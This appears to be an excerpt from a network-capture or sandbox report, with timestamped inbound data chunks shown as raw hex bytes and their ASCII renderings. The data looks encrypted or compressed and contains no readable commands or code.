                                                                                                                                                            2022-09-29 12:45:07 UTC14380INData Raw: d0 cf 68 f9 5c bd f9 e7 cc 78 8c 8c f2 6c bd 4b f5 41 9b 75 49 2f f4 7d 73 1c e1 48 59 34 57 f2 62 22 30 06 5e f1 27 96 b3 bd 0d bb 41 b2 03 ab b0 c2 64 81 4f c4 e7 84 26 3f f8 b6 35 ae 2c 83 d9 1a 1b e8 d9 ee 24 06 26 92 ea f9 a2 14 07 24 fe be 2e fe c7 55 f4 00 ca 2d 6c 2b 49 fc c6 b0 27 82 bb 01 ae 26 fd a6 eb 3b fb ad ff ea d8 1d 09 3c 4a 30 41 e6 77 7b 40 16 b1 3b 2e 9c 20 b9 69 c2 a5 7c 1b 95 16 ac c6 11 fd d2 70 44 c0 f1 6a d3 05 79 d0 57 7b 4b ab bf fb 6a eb b5 d8 b7 03 1a 56 fa 8c 2a c9 10 71 a1 95 cb 9d ca a2 8a 89 93 85 5b 70 83 36 5a dc b1 12 d3 28 cc be 24 21 2b 5b ea 77 cb 27 da cf d0 43 25 a0 c1 46 d5 e9 12 0d 00 b5 28 35 ea 63 d4 66 47 93 d5 33 3f ca f7 ee ea 0e fe 28 13 57 0e 5c 62 00 8e a8 21 2b c0 22 92 e7 79 81 d3 29 f1 5e 7e 6f cf b1
                                                                                                                                                            Data Ascii: h\xlKAuI/}sHY4Wb"0^'AdO&?5,$&$.U-l+I'&;<J0Aw{@;. i|pDjyW{KjV*q[p6Z($!+[w'C%F(5cfG3?(W\b!+"y)^~o
                                                                                                                                                            2022-09-29 12:45:07 UTC14396INData Raw: fc 55 6a 1d 63 9f 0e 01 dc 00 18 7b 2e 4e 30 a7 52 39 1d 76 f5 38 32 19 e6 88 c8 10 5a 8a d8 30 18 56 d9 98 ac 76 81 2f 73 44 06 73 8b 09 ea 51 53 ba 73 23 3e 20 bc 3d 8b df 25 f5 cb 6c c0 e7 f5 6f cf 12 45 ee 30 8b 02 63 49 e1 99 39 7f b2 24 66 ed 80 36 47 37 57 fa c9 29 68 80 07 a3 12 82 a8 ad 4a 22 f3 3a 6f 8b 3e b7 09 fd 27 8b 8b c1 8f 58 ad d5 7c 27 85 1c b7 c8 d6 26 6d a6 85 72 be 14 53 a1 6a ea 02 92 d8 69 ba 08 f7 e8 da 12 49 83 db f2 ab f7 2d 8b a3 51 db df 63 29 54 d0 25 03 76 c5 8f 01 f3 75 ff fe 09 44 a4 f8 31 1b cc 88 e7 22 18 25 e2 1f 77 36 f3 94 6e 17 27 a2 79 0a de fd 76 2d 1a da 57 19 f5 59 84 0e aa 2e 2a ea 93 7d 88 95 67 36 49 3a ac 0b b1 aa 83 4f 3d 24 78 41 8b 65 72 00 fe 08 96 96 90 d1 cc 73 ed de 0a af f6 55 97 48 4f 43 49 ea a9 e2
                                                                                                                                                            Data Ascii: Ujc{.N0R9v82Z0Vv/sDsQSs#> =%loE0cI9$f6G7W)hJ":o>'X|'&mrSjiI-Qc)T%vuD1"%w6n'yv-WY.*}g6I:O=$xAersUHOCI
                                                                                                                                                            2022-09-29 12:45:07 UTC14412INData Raw: 9d 7b 0e e1 92 ae 8d ae 7c 50 c0 07 22 3c 90 33 e5 97 52 af 93 a8 d7 91 62 0e bc 08 ed a4 66 6d 45 ad 05 a9 7f 24 d9 b1 48 cf 53 93 c8 fd 10 74 39 a4 67 67 81 6f e0 4a 1d 9d f8 5c 17 94 42 23 13 51 67 d8 0c 6a 7a ff 01 a4 ba dc 94 14 c3 0e ef b0 9e 6e 13 84 8e eb 61 0a 43 0d c3 4d d7 06 70 c7 ba 2c 5d 83 f7 c6 ab 64 13 d6 63 3f 14 54 33 be 3a cb c8 da 7b 9e 71 54 24 f6 f7 6c fa df e5 4f 7d d6 bb 26 1e d3 19 a4 79 29 4b 5d ea 6b 34 0d 1a ff f5 6f 0e 22 58 2b a5 5e 30 23 c5 e6 8b 7d 94 34 15 20 2a b6 a3 a3 e0 d5 9c f9 1a cc 8e 9f 5e ec 62 75 2f ea 89 85 95 87 99 7e fe 36 fe 99 c3 8b 0e cc 77 53 6e e0 34 09 24 db 72 c3 9b 42 da 19 db 74 1e b2 9d 7c a3 cf 68 de e9 42 ff 02 4a ae 9a 18 c8 c0 69 32 c0 e8 ad bc 2d b6 ec 37 f6 16 7f 30 bf 89 16 9f 01 09 72 67 e4
                                                                                                                                                            Data Ascii: {|P"<3RbfmE$HSt9ggoJ\B#QgjznaCMp,]dc?T3:{qT$lO}&y)K]k4o"X+^0#}4 *^bu/~6wSn4$rBt|hBJi2-70rg
                                                                                                                                                            2022-09-29 12:45:07 UTC14428INData Raw: 33 78 9e 7c 04 5e d1 d9 99 75 b1 19 31 00 8c cd f8 1d ce 6c 13 5e 74 1c 53 36 2b c1 79 c4 2c 2b ce 3d 86 ce 03 53 ab a5 d3 29 a9 ae 95 16 53 d7 fa 24 92 5c 67 d7 b3 ad 67 f7 b9 eb d3 4c ce 1e 91 d2 b2 16 e4 53 5a f9 80 1b e6 52 94 98 e7 2c 49 a7 d7 a1 72 1d e6 7a d4 0e 17 c4 30 18 9e 14 a5 8a c0 1a e0 52 b0 6e 36 b4 28 c9 60 6d dd 0d 27 d6 a6 a7 6f e7 4d 58 e7 83 28 b8 99 b7 d1 fe 6e 2e 96 e2 c8 59 fc f4 e6 63 95 03 32 bb 3d c2 da 82 9a 29 66 ff 02 b7 8a 19 18 be 86 10 ab 2d d3 7b 5b 08 2e 20 79 ea 86 58 13 2d e6 4d 0a 28 47 d7 a1 72 89 47 16 0d 25 9e ce 14 55 17 8a 2a 42 fa 08 81 58 94 d7 5d 35 36 75 d3 aa 08 c5 b7 00 ae 84 1e f3 34 55 5e d3 a8 17 72 0e 94 85 82 16 ef 6a 65 0f cb 65 cf 96 cb 2d 15 87 8b 68 cb 85 8f a7 af 2a 64 e5 96 af bd b7 6a 32 82 cf
                                                                                                                                                            Data Ascii: 3x|^u1l^tS6+y,+=S)S$\ggLSZR,Irz0Rn6(`m'oMX(n.Yc2=)f-{[. yX-M(GrG%U*BX]56u4U^rjee-h*dj2
                                                                                                                                                            2022-09-29 12:45:07 UTC14444INData Raw: 60 09 6e a6 1e 76 34 b0 2f b3 59 4f a8 ad ab 2f 9e 69 58 f4 23 5b fe c2 90 0b 1a bf 4d ef d7 de 68 55 be 37 3d b2 6c e9 b7 ff 9c 7b fc 7b b3 cd 95 05 f0 fc 19 cb 79 4b 43 df 65 46 cc 19 36 ef 71 fa c1 33 5e c9 00 9e 1f c3 7b 1e 0c 7f de 7a f1 c1 c9 8b a3 a8 e3 d4 9f a7 62 fb c9 83 4b b4 b5 6c 5e 7d 41 54 e6 79 1f b4 29 96 41 4f 0f 7a 0e 5a 74 d2 73 2b f8 26 62 e0 21 10 ec 43 42 80 20 83 4b 45 90 5f b0 09 a1 c7 75 c4 f4 0a f3 ea cc 1c d1 b0 f8 aa 3f 18 73 d3 9d 63 20 6d 54 ab 5c 1c bc 1e 69 07 61 8f 48 a8 48 d4 50 af 28 4c 6c 72 47 ee 37 87 c3 05 47 a5 58 34 54 77 1f 77 89 dd ba 0e 2f 07 c1 6e 0c 27 34 9b 73 ed d1 6c d9 4d 4b 08 99 ad dd 8d e0 07 4f 4b 16 60 35 44 fb 68 a0 43 d8 71 a1 32 70 7d b4 b2 69 2d 4c dc 42 75 f0 44 85 40 8c 5b 1f 77 9a f8 ad c1 b0
                                                                                                                                                            Data Ascii: `nv4/YO/iX#[MhU7=l{{yKCeF6q3^{zbKl^}ATy)AOzZts+&b!CB KE_u?sc mT\iaHHP(LlrG7GX4Tww/n'4slMKOK`5DhCq2p}i-LBuD@[w
                                                                                                                                                            2022-09-29 12:45:07 UTC14460INData Raw: fd e2 1c ab 3f d5 68 c2 8c ff 1e 93 b4 79 18 23 6c c0 d4 f3 b0 a4 90 02 b3 a5 ed 3c cb 48 75 bd 6a 87 e3 0a 01 fc 54 53 0a 17 56 62 57 a9 82 67 27 e4 65 32 3b d0 fa dc 71 10 10 cb ea 1d dd cd cb f5 69 e1 b6 d5 ce 85 96 8b 89 50 c7 64 69 e5 30 54 a5 62 05 5d 2d 10 9e 46 03 80 da 43 b5 03 e8 e8 12 77 05 76 a6 a5 6a 66 fa cc f5 17 35 6b e1 05 b4 1d cf 91 3f f7 bd d3 48 0e 85 9c 78 b6 26 e1 0d 6b 8e 9a f3 99 84 46 20 72 30 71 88 dd 1f 43 b5 ea 45 b0 ba 34 2e 3e fb 94 67 02 a3 08 32 49 3c ca c1 c0 9d e3 f0 b3 bf ae b6 53 b0 0b 8a a1 52 07 a9 6c 7f b9 6d 6b fc 6a 74 8b cd 10 e5 50 7b 3f fe 97 ce 43 00 38 85 86 53 88 6b 72 d4 82 74 ec 6a 2e 6d cb 99 c6 c1 49 ca 32 0e bb 9e 47 23 d2 e9 aa 68 af c2 f8 52 7d 55 7c 02 1f 67 7b 9d 0f 29 f8 93 ed ac dc bb 80 8c e5 1e
                                                                                                                                                            Data Ascii: ?hy#l<HujTSVbWg'e2;qiPdi0Tb]-FCwvjf5k?Hx&kF r0qCE4.>g2I<SRlmkjtP{?C8Skrtj.mI2G#hR}U|g{)
                                                                                                                                                            2022-09-29 12:45:07 UTC14476INData Raw: 0f 63 ce 20 3d 34 53 3e 94 77 9a 2d 08 07 fa 44 9d f6 2b 0e 39 80 59 71 b6 e5 9c 58 fe 5a 2b 64 22 5f e3 50 00 b3 09 b3 b3 c6 d5 d2 43 5a e3 c4 35 06 0a ab 89 da a9 1e 7c fe 85 5e b9 a0 92 f1 c1 1e a3 de 19 c2 9c ac 7a ee 71 ed b7 ea 31 1b f5 70 4c 59 ee 6c 12 d9 99 02 65 f9 08 95 76 f4 3c cb 5d 9e aa 5d ac ca 03 8b 05 9d 30 b5 56 00 9a af 74 19 58 e7 75 52 da 0a 67 b6 f5 5d c8 df e0 36 24 be 7d 12 61 9e b6 2b 97 a2 04 6c 13 84 df 4e 29 c4 19 6d f2 69 64 d8 de 54 96 9e 16 7c f2 a8 c5 11 da 62 ad 74 1d e7 b4 c1 ae d3 d3 38 62 2d e8 dc 8f 0d 37 84 12 f2 34 43 21 8d 0d b6 ac 20 c7 7f 1f 79 71 a4 65 0f 69 fa 22 a4 5d 81 16 0d 2d 30 95 52 e5 71 1c 9c 5c 91 52 e1 eb ef c5 ce 9e 50 ad 0f 47 8d ee dd b5 d7 65 6e 66 45 31 a0 c6 41 92 00 9c d7 e4 60 0f e6 64 6b bf
                                                                                                                                                            Data Ascii: c =4S>w-D+9YqXZ+d"_PCZ5|^zq1pLYlev<]]0VtXuRg]6$}a+lN)midT|bt8b-74C! yqei"]-0Rq\RPGenfE1A`dk
                                                                                                                                                            2022-09-29 12:45:07 UTC14492INData Raw: 0a 0a 68 6e 91 51 0f 5b 5e 75 bb 67 2b 63 13 1a 94 63 40 24 96 ee bb 7c 88 04 d2 e7 5b 7f bb 5b 56 b2 c0 b6 3b 93 68 69 e5 04 36 8c dc 22 b3 1b a4 87 67 3b d7 4b 13 83 df ad fe dc bd 26 e7 18 41 f9 e4 60 8c 44 56 22 59 02 7c ea 97 1f be 05 27 d7 66 7f 37 00 2e 6d ac f2 3a ba 3b fc cf c4 71 ac 5e 89 a4 51 56 45 f5 84 02 88 bf 6d 7a 6d 77 59 ce a5 cb 95 5b 56 5b e1 7e ac 94 50 da 8f f2 3b 1c 0c de d1 1c 8b 58 bd b5 cd 5c 8a ed 63 ec f9 bc 6c e4 18 de d8 14 ff 7e 37 c4 7e d2 bf b3 93 e9 1b b0 54 81 62 f6 37 3f 94 ff a1 25 5d 49 a0 f5 24 e1 41 fb 42 b6 75 2f fb 7e b2 98 1f 50 84 ec e2 ab 94 86 9e 11 7a e7 3d 71 a2 9f d6 c4 ff 09 9d ee db cc 90 5d eb 4b ad 00 cb f9 81 62 82 79 a0 ee 31 48 59 70 24 ea b1 1b 7a 9c 15 ea 1c 95 3d 58 90 21 49 2b 92 6b 6d 9f c8 4d
                                                                                                                                                            Data Ascii: hnQ[^ug+cc@$|[[V;hi6"g;K&A`DV"Y|'f7.m:;q^QVEmzmwY[V[~P;X\cl~7~Tb7?%]I$ABu/~Pz=q]Kby1HYp$z=X!I+kmM
                                                                                                                                                            2022-09-29 12:45:07 UTC14508INData Raw: 45 ba bb bd 98 d3 1d a5 7c 5d 61 b7 1d 35 21 2e d0 31 8d 18 cd 02 5d be 60 3b 2c 45 38 7e 1c d3 f0 6b 50 da 78 a5 9e 6a 19 f7 61 53 78 0c f0 5e 77 b2 23 f8 dc f6 30 be 52 41 b9 05 95 0f 7d 80 a3 ce 05 b4 48 91 08 88 9d c4 ed c0 77 a2 5a b0 e9 ff 32 07 12 46 51 82 0b 51 97 ef eb 9e 43 91 a2 9d f6 f4 3d a3 07 f7 16 8a 40 3e 00 d6 ed f0 a7 a1 fc f4 5f 52 08 c0 58 95 f4 f7 d7 4a c2 20 ff 52 5b bf 15 4b 90 8b fc 79 3d d4 58 ef dd 37 8f 11 be b3 18 7f bd 71 d3 9f 65 80 ab cb 00 6a ba a0 71 ce 40 55 a7 9e 9e cb 41 53 05 a0 b4 85 92 17 d5 ab be 78 cb ff 82 a2 fa 71 e3 89 a3 8e 88 66 38 0e 89 59 30 26 3f 15 19 c8 3f 95 66 6f 6e eb 2a 51 75 96 eb 51 1d 9d 91 ab cb 96 75 36 c5 71 90 6a c4 9c b6 17 de 56 14 c8 4e 8d 3d 65 76 7c 46 b1 80 3e 70 6d b1 23 d3 70 19 01 21
                                                                                                                                                            Data Ascii: E|]a5!.1]`;,E8~kPxjaSx^w#0RA}HwZ2FQQC=@>_RXJ R[Ky=X7qejq@UASxqf8Y0&??fon*QuQu6qjVN=ev|F>pm#p!
                                                                                                                                                            2022-09-29 12:45:07 UTC14524INData Raw: 5e cb e2 88 ff af f9 fa 9a 86 c0 c1 9f bf a0 19 d5 da 05 23 19 4b 25 ae 11 3c ac 0d 4a 28 4d e5 0d 3b d1 4a 5b 2b 4a 7e 38 ed 73 dc c5 69 97 4e 03 60 b7 96 3d 6f e3 7c dc 07 d3 47 37 51 02 c3 a9 ce 12 c4 09 52 43 e1 8c b3 c7 7d b4 bd 0a 11 fa a1 3a 0f 80 e1 82 23 08 64 00 04 06 b0 02 c5 ec 72 01 1b f2 91 bd 28 25 79 ba 97 48 61 fe 06 a3 cd 63 fd 2d 66 72 9c 90 72 89 1a dc 18 b6 19 a0 9d 72 19 34 0f 0f 0b c4 e3 55 b1 c8 36 b4 90 a0 21 39 bf 55 f6 c9 7f 31 41 c1 24 6b ce 10 e4 f0 4d 6d 27 e8 48 a5 29 c0 9c e3 c5 b9 de 47 5d 26 15 e6 70 47 9f 63 1d af b3 83 52 27 de 33 22 57 5b fb 6b 23 0c 80 99 1c f4 13 86 77 fd f1 b9 d1 ce 3c fb 86 81 13 9a 75 3d 19 64 6a 4e 58 c8 e4 cd f3 ea 76 f5 c9 fd 3d b7 99 72 78 e6 67 98 5b 5e 12 2f 7c 08 f1 94 d9 ca c2 9e 1e 28 8d
                                                                                                                                                            Data Ascii: ^#K%<J(M;J[+J~8siN`=o|G7QRC}:#dr(%yHac-frrr4U6!9U1A$kMm'H)G]&pGcR'3"W[k#w<u=djNXv=rxg[^/|(
                                                                                                                                                            2022-09-29 12:45:07 UTC14540INData Raw: 74 6c 8f 61 15 d6 f6 ba 5f a5 d6 f2 9b fd d7 70 7a 14 b1 26 d8 69 fa 90 7c 0f 83 45 12 1f 42 1c e7 fb ff cc 51 a4 5f 70 9f 53 74 c9 05 64 89 31 17 a2 3c f0 5e 16 71 c3 ad bd 99 bc 85 f2 d6 3e 9c 26 48 58 86 87 79 f5 33 49 6b 7c 32 af b3 fc 1f 0c 12 8b 0b 5b c4 37 f3 cb fb 46 fa 7c 0a db 07 aa 9a 05 69 f4 60 b3 c4 37 a9 db aa c9 d1 f6 c9 f2 e6 bd 4a 29 5c 12 9a 2e b7 ea db 8e cd 17 e0 17 58 1b 49 d1 e9 6f 15 91 a1 e3 6a 0e fe e4 cf 51 12 16 54 91 0e 57 e4 eb ec 9e 32 99 ce 2c 74 14 92 4b 1d a9 71 95 11 28 f4 57 16 9c ff 1b 50 86 c4 48 fa 99 bd 7d c5 74 46 bd 20 6c 7a be 38 24 c4 bf 68 0c 7d 9c f5 5e 29 07 27 44 89 91 8d a0 b7 27 ae 35 0a 59 00 8e 5b fa 53 0f 5d c0 a6 9d 42 28 84 f0 91 30 6d 3b da 55 17 70 e4 39 f0 bc 7c fd 7d 42 c4 38 23 ed 9e a3 34 05 0b
                                                                                                                                                            Data Ascii: tla_pz&i|EBQ_pStd1<^q>&HXy3Ik|2[7F|i`7J)\.XIojQTW2,tKq(WPH}tF lz8$h}^)'D'5Y[S]B(0m;Up9|}B8#4
                                                                                                                                                            2022-09-29 12:45:07 UTC14556INData Raw: 5d 73 fa dc 61 37 5c 00 72 4e 13 6d 6b 93 24 bb bb ce 8d 0d 9d 8a 28 89 6b 7e 95 64 3e 7a 5a d8 43 b0 9f 02 4e f2 ec 9b d5 ab f2 c5 fc b0 37 17 8c 71 3c b8 6d 80 b8 1f f8 ec e4 1d be 73 70 65 57 c9 33 aa 68 3a 58 aa 87 11 a9 a7 e6 37 13 d4 23 6a 87 7e 8b 93 2a bb 42 a1 b4 b6 78 3b a2 ae 05 dd 5a 13 00 e5 1b 30 85 94 9e 81 9c 96 65 22 c6 1a 4c b2 7c d3 96 04 a1 97 db 2e 6c d9 29 f0 4d f3 16 78 c5 df d6 22 39 62 26 85 81 45 5d 6c 9b 76 af d3 99 c0 5b e6 3e b7 e6 54 bc f0 c4 d5 86 ef 21 e3 ce 1f 5f b8 ec d3 76 70 4a de 28 fe bc 28 0e 99 96 29 30 f0 3a 33 cf 05 b4 49 ad 23 44 90 b4 72 d2 b0 e0 ed 2f 74 02 da d0 39 ea c2 1a 24 a6 d6 97 42 1e 5b 12 02 ba d3 2f 44 cc 96 62 8b 6a 12 b0 ad ab 57 07 e4 4e 0d 17 1f d0 e2 0c 29 07 52 33 97 8c ed e4 fc 0b ba 0e 5b 1e
                                                                                                                                                            Data Ascii: ]sa7\rNmk$(k~d>zZCN7q<mspeW3h:X7#j~*Bx;Z0e"L|.l)Mx"9b&E]lv[>T!_vpJ(()0:3I#Dr/t9$B[/DbjWN)R3[
                                                                                                                                                            2022-09-29 12:45:07 UTC14572INData Raw: db 9d 1c 8b 79 59 0f d4 04 a3 a9 c4 b6 15 25 3c b9 f1 61 fd 79 0a db c1 36 76 08 4b f8 4d 1c 8c 40 24 02 23 c7 35 40 c4 0a 72 cf c4 a4 1a ad bc 9d be f5 b3 4f a0 d9 a0 98 07 f5 e9 c2 52 c6 d8 1c fc 7c a3 7d 18 bb 0d 5c b6 32 75 31 10 4b 3f 97 18 75 10 20 f5 1a 81 b8 61 7a 4d a6 d9 1a d2 92 9e f8 ad 39 9c 1b 23 40 68 49 c6 a1 54 27 3c a4 f5 2d d5 29 71 e2 9b 48 50 fe be 39 6f 23 03 f8 20 8d d7 93 44 dd 00 a3 da 42 33 8c a5 04 ae e5 34 af 04 db 7f ed 86 e7 12 95 5b b6 a7 99 76 a8 41 06 7e c8 b6 21 6a 6a e8 14 9b b1 d8 6b 00 e0 75 41 f0 d7 ee e2 43 28 e6 09 4a 18 f1 19 d2 1a d4 04 46 29 aa 7c b1 82 32 8c b6 f1 1d b6 b1 75 3f 09 cc 81 31 ea 9f 1c b6 cc b8 d7 02 62 3d 0d a2 fa 08 2b 75 8f 41 6f fe e2 5d 7b 84 c5 7f 25 f0 c2 47 25 a4 16 10 d6 12 cc 43 15 1c ad
                                                                                                                                                            Data Ascii: yY%<ay6vKM@$#5@rOR|}\2u1K?u azM9#@hIT'<-)qHP9o# DB34[vA~!jjkuAC(JF)|2u?1b=+uAo]{%G%C
                                                                                                                                                            2022-09-29 12:45:07 UTC14588INData Raw: 85 e2 68 dc 6b f1 70 ef 5e 7d cf 10 dc 93 86 36 ed b6 6a 92 6d 89 c4 81 14 76 20 c5 c0 aa e1 e1 df ca 0d 71 c5 8e 1e 4a 34 81 11 cf 58 2e 95 58 9c 5a c8 1f a9 23 89 6a 2a 2f 4b 45 9f 5c cd 43 17 dd 7c 9a c6 be 2e 82 05 a2 44 45 ba 3f ff 8d b9 98 c4 f1 85 07 79 21 4e f7 8a dd 66 d2 1d 75 57 35 9c 80 23 d6 65 f2 43 f7 90 e7 b5 85 d1 51 4d 47 dc 20 3d d3 7e d5 5f 19 ef 4a d8 f1 7c 6c 26 c7 13 82 5d f4 21 50 8e 8a c7 de 1c 84 12 6c 53 b3 d0 b5 56 17 10 d2 e4 b9 75 e1 83 2f 72 1f bd 15 60 46 48 3b bf 60 01 15 8b 1d e2 c4 6c f1 54 57 47 75 5b 3a 5f c9 1e de a1 1b b0 68 af b3 40 62 9a b8 41 55 5e d8 96 57 4a dd 16 b8 1a 4e f7 3e 01 d7 c5 10 4f 24 b9 8d 26 25 95 05 59 e2 37 ed 4c 90 98 7b ae c3 bb 5f 1a dc 6b e4 33 75 a1 64 97 01 1b ae 00 1e 50 a1 36 97 d6 c7 df
                                                                                                                                                            Data Ascii: hkp^}6jmv qJ4X.XZ#j*/KE\C|.DE?y!NfuW5#eCQMG =~_J|l&]!PlSVu/r`FH;`lTWGu[:_h@bAU^WJN>O$&%Y7L{_k3udP6
                                                                                                                                                            2022-09-29 12:45:07 UTC14604INData Raw: d1 99 a6 93 d5 76 4d 89 02 a7 97 14 39 6b ca 78 87 7f 5c ee f5 f1 1f 4d 7e 0f 35 e5 3a 6e 7a 10 7c 52 8e 1e a8 07 00 cf 57 64 eb 65 e4 05 44 57 a8 30 b8 d4 b1 b8 88 a4 ee 59 e1 40 7a 77 55 43 2e a1 c6 5e bb 74 1e 15 f6 55 7b 00 30 5b a0 26 ec c3 ca b9 af 18 04 43 31 bf 89 e6 78 06 10 4b 53 49 3a 11 d0 6c 57 43 38 7b 4b d6 d3 86 c1 b5 15 be a5 14 30 0c aa 46 81 b3 67 25 03 b7 a9 db ad c3 eb 6a 60 77 9a 4e 29 87 f0 e5 b0 f1 fe 77 46 e9 a8 84 2c 68 c5 30 00 44 54 5c a5 e5 0c 20 a5 1e 59 97 86 dc c5 f8 04 04 a3 39 58 37 8a a9 66 3c b8 ec 01 99 89 52 09 18 38 68 d0 e5 0c 07 f1 b2 9d 09 92 3e c2 c3 42 1d 46 c6 5a 25 af 2a 73 9b c6 36 42 89 2d 44 0b 09 0c 0e 6c 47 1c f6 cd 50 b0 b0 f5 a2 00 92 f0 87 ce f4 28 ac 00 d3 55 bd 01 46 87 ce 0a 92 ca 0d 87 29 dc 44 11
                                                                                                                                                            Data Ascii: vM9kx\M~5:nz|RWdeDW0Y@zwUC.^tU{0[&C1xKSI:lWC8{K0Fg%j`wN)wF,h0DT\ Y9X7f<R8h>BFZ%*s6B-DlGP(UF)D
                                                                                                                                                            2022-09-29 12:45:07 UTC14620INData Raw: 01 0a 5f bd ba e6 f2 e6 a8 1f fa bf 58 ee 6a da 70 d1 45 4d 85 88 0b 32 6e e9 00 32 60 ec f1 3a b5 27 94 de c9 71 e4 b0 2e 87 45 b3 ee 9b c6 e6 f5 94 c2 0b 98 c7 d8 43 1d 04 f4 b1 68 4f dc be 1d aa c8 ef 68 5f 63 a1 53 4e eb 27 67 b9 ce d9 e6 c7 cf 29 85 7f 09 03 1a 9c 04 52 6a 92 b6 74 a0 e8 9e aa f8 25 64 2f 5a 46 2a 2c 58 03 78 95 5e 99 1c e1 24 d5 d9 35 e5 03 2c 11 6f 23 2c 88 cf 78 7a fa 12 d7 27 93 90 c3 bd 03 58 ca 78 49 0c 92 ef 3a cc 48 2e b7 98 5a 3c 02 37 d0 ba 91 ad 42 a2 c3 71 b9 9f e7 67 bf d2 e9 ac bb f8 b3 d6 aa 25 a9 e6 91 7f e0 d7 68 d4 ee 05 50 82 52 c7 9c 8f 16 6f 4b 32 0a 85 9c 5f 64 e1 b3 dd a3 c8 e8 c4 c8 39 1d d2 7b 87 d8 4a f0 36 e5 45 d1 c7 19 4c 08 fb 09 82 09 42 5a ad 16 aa c1 98 fe ce 3d 00 1f b0 13 96 35 5d 1d 2d 6a fe 9a f3
                                                                                                                                                            Data Ascii: _XjpEM2n2`:'q.EChOh_cSN'g)Rjt%d/ZF*,Xx^$5,o#,xz'XxI:H.Z<7Bqg%hPRoK2_d9{J6ELBZ=5]-j
                                                                                                                                                            2022-09-29 12:45:07 UTC14636INData Raw: 28 dd fb 15 db 2a 8c b7 45 33 18 c0 b8 d0 95 d2 c7 e6 56 2d 8f b9 bd a6 fb b8 40 67 5e b9 b4 2f 03 de f7 45 cc 45 f3 41 fa a7 69 99 44 36 a8 00 3d 6f 27 01 7f 2c 09 1b 71 fa 13 36 98 c4 1a d9 09 34 91 ea 81 35 43 0c 94 a9 b7 53 fd cf a7 d7 a0 04 38 66 d2 d5 5f ff ad f3 79 59 bc 5d 0f 93 a1 11 e8 38 16 24 cd 33 92 b1 23 9b 8b d4 a4 b4 5f c5 7f cf 90 b7 47 b2 c7 84 56 fa c4 07 96 81 f3 12 18 63 d3 94 ff 6b c6 8f 9c e0 6e 13 3b 8a 16 7b 47 80 28 47 db 97 1e 28 4e 42 da ec f7 65 70 ea c8 c1 c1 5f 0a fb 31 cb 3c 4c a7 04 f8 fb 02 15 3a 58 df a0 77 93 1c 1c a0 6b d9 7f 0d 29 a6 b4 5c 93 3c 0a 25 d1 47 9a 1c cc 88 d2 03 fe f0 4f 89 16 2a 92 4d 45 e7 5b 0b 3c c2 28 6d f2 dd 83 ac 83 99 5b 2c c9 6a a4 fb 39 c9 c1 b8 8e 38 51 9b 61 8a de 31 66 3f 37 f8 43 1e 38 5b
                                                                                                                                                            Data Ascii: (*E3V-@g^/EEAiD6=o',q645CS8f_yY]8$3#_GVckn;{G(G(NBep_1<L:Xwk)\<%GO*ME[<(m[,j98Qa1f?7C8[
                                                                                                                                                            2022-09-29 12:45:07 UTC14652INData Raw: 9a 86 c7 ea c2 0b 29 1b 2d cc 9a 46 53 c9 ac 00 ee 6c 32 0d 6a b1 da 1c 11 4a bb a0 71 0f 5c 4c e0 68 4d 62 57 79 3b 51 41 ae 12 47 53 37 26 c6 4e 45 51 cf e7 53 6c 20 d7 bc e5 d1 ea 8f 66 52 ea 1b 0a 1a 54 a3 93 46 fc a7 dd 1d 47 01 c4 a0 3d c8 39 57 f4 20 30 8d 4a 97 d5 92 0e 27 8c 00 f5 d7 5b 01 12 2c cf 3d 75 8d e6 6f fc d7 4f 54 32 8a 3d 5b 1a 07 e7 ff 44 20 4a 60 80 8a ea b9 5c 0b b0 c5 52 3e 6c 45 50 d5 05 86 f8 e8 60 36 bb 41 ed dc 22 0c b4 bd 20 0d 9a 6a a9 85 f6 3f eb 6e 0f 9c ff 32 cb 15 81 68 76 dc 89 b7 77 cc 52 a6 a8 38 63 b1 08 4a 5a bc df 09 02 9e 62 f9 a7 35 a6 19 44 0d b5 2d ad a0 39 ff 24 3e 44 4d 36 e3 62 b9 a4 00 a7 37 bc 0e 42 0b 81 b6 db c5 4f 27 b8 25 11 38 1f ce 2f af 7c 38 b0 36 83 59 04 2c 4c 62 38 bb d9 ae a8 3c e6 3c db d1 13
                                                                                                                                                            Data Ascii: )-FSl2jJq\LhMbWy;QAGS7&NEQSl fRTFG=9W 0J'[,=uoOT2=[D J`\R>lEP`6A" j?n2hvwR8cJZb5D-9$>DM6b7BO'%8/|86Y,Lb8<<
                                                                                                                                                            2022-09-29 12:45:07 UTC14668INData Raw: b2 1d 54 48 c0 34 b2 03 e8 3a 3a 97 49 2e f2 0f 7f ce 1b 0a 4e 6a c0 d0 60 3a 0e e1 e5 42 93 14 2c 5f 26 9b 2c de df 09 0f 49 2b 87 fb 07 4e 51 d2 95 f0 d4 1e ca 9d 53 97 a4 19 78 5b f9 6d 70 0b b5 f3 7e 3e 41 32 b3 c7 61 01 8e 2d 01 06 d8 99 c6 f3 cf 97 d2 2b 90 d0 ae 77 ae 0c 72 ad da f6 51 58 7e 9d 0b ed 44 92 5c 74 d2 98 eb 38 83 7d 98 b7 a9 3c 8b 72 07 1d 6f 5f c6 29 3b 22 23 cc a1 da dd a1 b3 5d bd 8c b8 fe 66 f2 ed df ce 9d d8 72 38 cb 30 f9 f0 d0 f0 32 c1 b3 4d 5a 90 37 2b 5b 05 3a 8e 0e 6a 66 43 a3 3b 90 b3 1e 16 48 68 f0 6d bf 39 38 bd ca a9 e1 97 87 0e d8 66 cc 0c ef 5b c2 b5 74 9d f3 29 69 e1 3c 09 b4 82 61 85 36 79 d2 3f 86 e7 90 98 d2 ef fb 21 96 f5 64 f9 60 cd ac 92 05 40 0e b6 e9 9c d4 eb aa 59 19 dc a2 c6 8f 42 df 15 74 20 f6 fb 9d 52 9b
                                                                                                                                                            Data Ascii: TH4::I.Nj`:B,_&,I+NQSx[mp~>A2a-+wrQX~D\t8}<ro_);"#]fr802MZ7+[:jfC;Hhm98f[t)i<a6y?!d`@YBt R
